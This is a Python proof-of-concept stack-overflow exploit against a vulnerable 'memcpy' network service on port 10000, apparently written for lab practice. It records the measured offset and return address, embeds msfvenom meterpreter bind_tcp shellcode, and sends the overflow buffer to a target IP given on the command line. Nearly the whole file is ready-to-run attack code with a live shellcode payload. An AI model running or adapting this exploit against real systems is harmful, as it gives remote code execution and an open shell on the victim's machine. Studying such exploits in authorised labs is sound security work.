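#!/usr/bin/python
"""Stack-overflow proof of concept for the vulnerable "memcpy" server on TCP/10000.

Layout of the buffer sent to the target (see the stack trace further down):

    [ OFFSET bytes of 'A' ][ saved return address ][ shellcode ][ 'DDDD' ]

The saved return address is overwritten with the stack address at which the
shellcode lands, so the vulnerable function's ``ret`` transfers control straight
into the payload.

Caveats for anyone reusing this:

* OFFSET and RET_ADDR were measured with a pattern generator and Immunity
  Debugger against one particular target build.  A hard-coded stack address
  only works while the stack ends up at the same address on every run (no
  stack randomisation for that process) -- re-measure both values on any
  other target rather than trusting these numbers.
* The return address ends in a NUL byte.  That is fine for a memcpy-style copy
  (the bug this script targets) but would truncate a strcpy-style copy, so the
  buffer is tied to the specific overflow.
* The shellcode was produced with msfvenom (see the comment above SHELLCODE).
  The example command is a bind_tcp stager; if that is what was generated, it
  leaves a listening port on the target that anyone can reach until a handler
  connects.  Use only against hosts you are authorised to test.
* Works under Python 2 and 3: the buffer is built as bytes throughout, where the
  original mixed a str prefix with bytes chunks (a TypeError on Python 3).

Usage: exploitServerMemcpy.py <target-ip>
"""
import socket
import struct
import sys

# Port the vulnerable service listens on.
TARGET_PORT = 10000

# Offset to the saved return address, found with a pattern generator and ImmunityDBG.
# Overwriting the next 4 bytes with "BBBB" makes the debugger report EIP=42424242,
# which confirms the offset.
OFFSET = 268

# Stack address the shellcode starts at (0022FB70 in the trace below).  struct packs
# it little-endian, which is what the hand-written "\x70\xfb\x22\x00" encoded.
RET_ADDR = 0x0022FB70

# STACK trace captured while sending A*268 + "BBBB" + "CCCC" + "DDDD":
'''
0022FB54 41414141 AAAA
0022FB58 41414141 AAAA
0022FB5C 41414141 AAAA
0022FB60 41414141 AAAA
0022FB64 41414141 AAAA
0022FB68 41414141 AAAA
0022FB6C 42424242 BBBB
0022FB70 43434343 CCCC <---- The stack address our shellcode starts from is 0022FB70, this in reverse (due to little endiannness) will replace B's
0022FB74 44444444 DDDD
'''

# Trailing marker bytes kept after the shellcode; they have no function beyond
# being visible in the debugger.
TRAILER = b"DDDD"

# msfvenom to generate a payload of choice
# Eg: msfvenom -p windows/meterpreter/bind_tcp LHOST=192.168.59.130 LPORT=44444 -f python
# Regenerate this when you change payload, port, or need different bad-char handling.
SHELLCODE = (
    b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
    b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
    b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
    b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
    b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
    b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
    b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
    b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
    b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
    b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
    b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
    b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
    b"\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
    b"\xff\xd5\x6a\x0b\x59\x50\xe2\xfd\x6a\x01\x6a\x02\x68"
    b"\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\xad\x9c\x89"
    b"\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x85"
    b"\xc0\x75\x58\x57\x68\xb7\xe9\x38\xff\xff\xd5\x57\x68"
    b"\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e\x4d\x61"
    b"\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f"
    b"\xff\xd5\x83\xf8\x00\x7e\x2d\x8b\x36\x6a\x40\x68\x00"
    b"\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5"
    b"\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff"
    b"\xd5\x83\xf8\x00\x7e\x07\x01\xc3\x29\xc6\x75\xe9\xc3"
    b"\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"
)


def build_payload(shellcode=SHELLCODE, offset=OFFSET, ret_addr=RET_ADDR, trailer=TRAILER):
    """Return the overflow buffer: padding, packed return address, shellcode, trailer.

    Parameters
    ----------
    shellcode : bytes
        Code to run after the return address is hijacked.
    offset : int
        Number of filler bytes before the saved return address.
    ret_addr : int
        32-bit address written over the saved return address, packed little-endian.
    trailer : bytes
        Bytes appended after the shellcode (markers only).

    Raises
    ------
    struct.error
        If ``ret_addr`` does not fit in 32 bits.
    """
    return b"A" * offset + struct.pack("<I", ret_addr) + shellcode + trailer


def send_payload(host, payload, port=TARGET_PORT, timeout=10.0):
    """Connect to ``host:port`` and deliver ``payload`` in full.

    ``sendall`` is used instead of ``send`` so a partial write cannot leave the
    target with a truncated buffer (which would silently break the overflow).
    The socket is always closed, even if the connect or write fails.
    """
    sock = socket.create_connection((host, port), timeout)
    try:
        sock.sendall(payload)
    finally:
        sock.close()


def main(argv=None):
    """Entry point: ``exploitServerMemcpy.py <target-ip>``.  Returns an exit code."""
    argv = sys.argv if argv is None else argv
    if len(argv) != 2:
        sys.stderr.write("usage: %s <target-ip>\n" % argv[0])
        return 2
    send_payload(argv[1], build_payload())
    # Once this is done you may use nc or a meterpreter handler to connect back or
    # listen, depending on the payload you sent.
    return 0


if __name__ == "__main__":
    sys.exit(main())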